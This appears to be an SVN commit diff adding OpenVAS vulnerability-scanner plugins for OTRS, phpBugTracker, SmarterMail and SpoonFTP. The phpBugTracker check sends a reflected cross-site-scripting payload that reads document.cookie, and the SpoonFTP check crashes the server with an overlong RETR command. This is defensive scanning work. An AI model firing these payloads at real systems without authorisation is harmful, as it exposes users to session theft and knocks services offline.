+  exit(0);
+}
+
+
+include("version_func.inc");
+include("http_func.inc");
+
+otrsPort = get_http_port(default:80);
+if(!otrsPort){
+  exit(0);
+}
+
+otrsVer = get_kb_item("www/" + otrsPort + "/OTRS");
+if(!otrsVer){
+  exit(0);
+}
+
+otrsVer = eregmatch(pattern:"^(.+) under (/.*)$", string:otrsVer);
+if(isnull(otrsVer[1])){
+  exit(0);
+}
+
+if(version_is_less(version:otrsVer[1], test_version:"3.0.6")){
+  security_warning(otrsPort);
+}

Added: trunk/openvas-plugins/scripts/secpod_phpbugtracker_multiple_xss.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_phpbugtracker_multiple_xss.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/secpod_phpbugtracker_multiple_xss.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_phpbugtracker_multiple_xss.nasl 13922 2011-03-18 18:16:16Z mar $
+#
+# phpBugTracker Multiple Reflected Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(900275);
+  script_version("$Revision: 1.0$");
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("phpBugTracker Multiple Reflected Cross Site Scripting Vulnerabilities");
+  desc = "
+  Overview:
+  This host is running phpBugTracker and is prone to multiple reflected cross-site scripting
+  vulnerabilities.
+
+  Vulnerability Insight:
+  The multiple flaws are due to:
+  - Input passed via the 'form' parameter to the 'query.php' script is not
+    properly sanitized before being returned to the user.
+  - 'newaccount.php' are also vulnerable because they fail to perform filtering
+     when using the REQUEST_URI variable.
+
+  Impact:
+  Successful exploitation will let the attackers to execute arbitrary script code
+  in the browser of an unsuspecting user in the context of the affected site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  phpBugTracker version 1.0.5
+
+  Fix: No solution or patch is available as on 18th March, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://sourceforge.net/projects/phpbt/files/phpbt/
+
+  References:
+  http://packetstormsecurity.org/files/view/98572/ZSL-2011-4996.txt ";
+
+  script_description(desc);
+  script_summary("Check for phpBugTracker Cross Site Scripting Vulnerability");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("phpBugTracker_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+phpPort = get_http_port(default:80);
+if(!phpPort){
+  exit(0);
+}
+
+## Get directory from KB
+dir = get_dir_from_kb(port:phpPort, app:"phpBugTracker");
+if(!dir){
+  exit(0);
+}
+
+## Try XSS attack
+sndReq = http_get(item:string(dir, "/query.php?op=doquery&form=1>'><script>" +
+                       "alert(document.cookie)</script>"), port:phpPort);
+rcvRes = http_send_recv(port:phpPort, data:sndReq);
+
+## Confirm the attack
+if((">alert(document.cookie)<" >< rcvRes)){
+  security_warning(phpPort);
+}

Added: trunk/openvas-plugins/scripts/secpod_smartermail_multiple_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_smartermail_multiple_vuln.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/secpod_smartermail_multiple_vuln.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_smartermail_multiple_vuln.nasl 14303 2011-03-25 15:15:15Z mar $
+#
+# SmarterMail Multiple Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(901196);
+  script_version("$Revision: 1.0 $");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("SmarterMail Multiple Vulnerabilities");
+  desc = "
+  Overview: This host is running SmarterMail and is prone to multiple
+  vulnerabilities.
+
+  Vulnerability Insight:
+  Input passed in the 'path' parameter to Main/frmStoredFiles.aspx, the 'edit'
+  parameter to UserControls/Popups/frmAddFileStorageFolder.aspx, the
+  'SubjectBox_SettingText' parameter to Main/Calendar/frmEvent.aspx, the 'url'
+  parameter to UserControls/Popups/frmHelp.aspx, the 'folder' parameter to
+  UserControls/Popups/frmDeleteConfirm.aspx, the 'editfolder' parameter to
+  UserControls/Popups/frmEventGroup.aspx, the 'deletefolder' parameter to
+  UserControls/Popups/frmEventGroup.aspx, and the 'bygroup' parameter to
+  Main/Alerts/frmAlerts.aspx is not properly sanitised before being returned
+  to the user.
+
+  Impact:
+  Successful exploitation could allow attackers to conduct cross site scripting,
+  shell upload and directory traversal attacks.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  SmarterTools SmarterMail versions 7.4 and prior.
+
+  Fix: Upgrade to SmarterTools SmarterMail 8.0 or later,
+  For updates refer, http://www.smartertools.com/smartermail/mail-server-software.aspx
+
+  References:
+  http://secunia.com/advisories/41677/
+  http://secunia.com/advisories/41485/
+  http://www.exploit-db.com/exploits/16955/
+  http://packetstormsecurity.org/files/view/99169/smartermail-xsstraversalshell.txt ";
+
+  script_description(desc);
+  script_summary("Check for the version of SmarterMail");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("secpod_smartermail_detect.nasl");
+  script_require_keys("SmartMail/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get SmarterMail Version from KB
+smVer = get_kb_item("SmartMail/Ver");
+if(!isnull(smVer))
+{
+  ## Check for SmarterMail versions 7.4 and prior
+  if(version_in_range(version:smVer, test_version:"7.0", test_version2:"7.4")) {
+    security_warning(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_smartermail_multiple_vuln.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/secpod_spoonftp_retr_cmd_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_spoonftp_retr_cmd_dos_vuln.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/secpod_spoonftp_retr_cmd_dos_vuln.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -0,0 +1,131 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_spoonftp_retr_cmd_dos_vuln.nasl 14437 2011-03-22 15:10:17Z mar $
+#
+# SpoonFTP 'RETR' Command Remote Denial of Service Vulnerability
+#
+# Authors:
+# Veerendra G.G <veernedragg at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(900274);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("SpoonFTP 'RETR' Command Remote Denial of Service Vulnerability");
+  desc = "
+  Overview:
+  The host is running SpoonFTP Server and is prone to denial of service
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an error while parsing 'RETR' command, which
+  can be exploited to crash the FTP service by sending 'RETR' command with
+  an overly long parameter.
+
+  Impact:
+  Successful exploitation will allow attackers to cause a denial of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Softpedia SpoonFTP 1.2, other versions may also be affected.
+
+  Fix: No solution/patch is available as on 22nd March, 2011. Information
+  regarding this issue will updated once the solution details are available.
+  For updates refer, http://www.softpedia.com/progDownload/SpoonFTP-Download-49969.html
+
+  References:
+  http://www.exploit-db.com/exploits/17021/
+  http://www.securityfocus.com/bid/46952/info
+  http://www.softpedia.com/progDownload/SpoonFTP-Download-49969.html
+
+  ";
+  script_description(desc);
+  script_summary("Determine if SpoonFTP is prone to denial of service vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("FTP");
+  script_require_ports("Services/ftp", 21);
+  exit(0);
+}
+
+##
+## The script code starts here
+##
+
+include("ftp_func.inc");
+
+ftpPort = get_kb_item("Services/ftp");
+if(!ftpPort){
+  ftpPort = 21;
+}
+
+## check port status
+if(!get_port_state(ftpPort)){
+  exit(0);
+}
+
+## Confirm the Application installed
+banner = get_ftp_banner(port:ftpPort);
+if("220 SpoonFTP" >!< banner){
+  exit(0);
+}
+
+## Open the socket on port 21. if it fails exit
+soc1 = open_sock_tcp(ftpPort);
+if(!soc1){
+  exit(0);
+}
+
+## Check for the default user name
+user = get_kb_item("ftp/login");
+if(!user){
+  user = "anonymous";
+}
+
+## check for the default password
+pass = get_kb_item("ftp/password");
+if(!pass){
+  pass = string("anonymous");
+}
+
+##  Exist if not able to login
+ftplogin = ftp_log_in(socket:soc1, user:user, pass:pass);
+if(!ftplogin){
+  exit(0);
+}
+
+## Send the crafted data
+send(socket:soc1, data:string("RETR ", crap(length: 4000, data:'/\\'),'\r\n'));
+
+## Close the socket after sending exploit
+ftp_close(socket:soc1);
+
+sleep (2);
+
+## Open the socket to confirm FTP server is alive
+soc2 = open_sock_tcp(ftpPort);
+if(!soc2){
+  security_hole(ftpPort);
+  exit(0);
+}
+ftp_close(socket:soc2);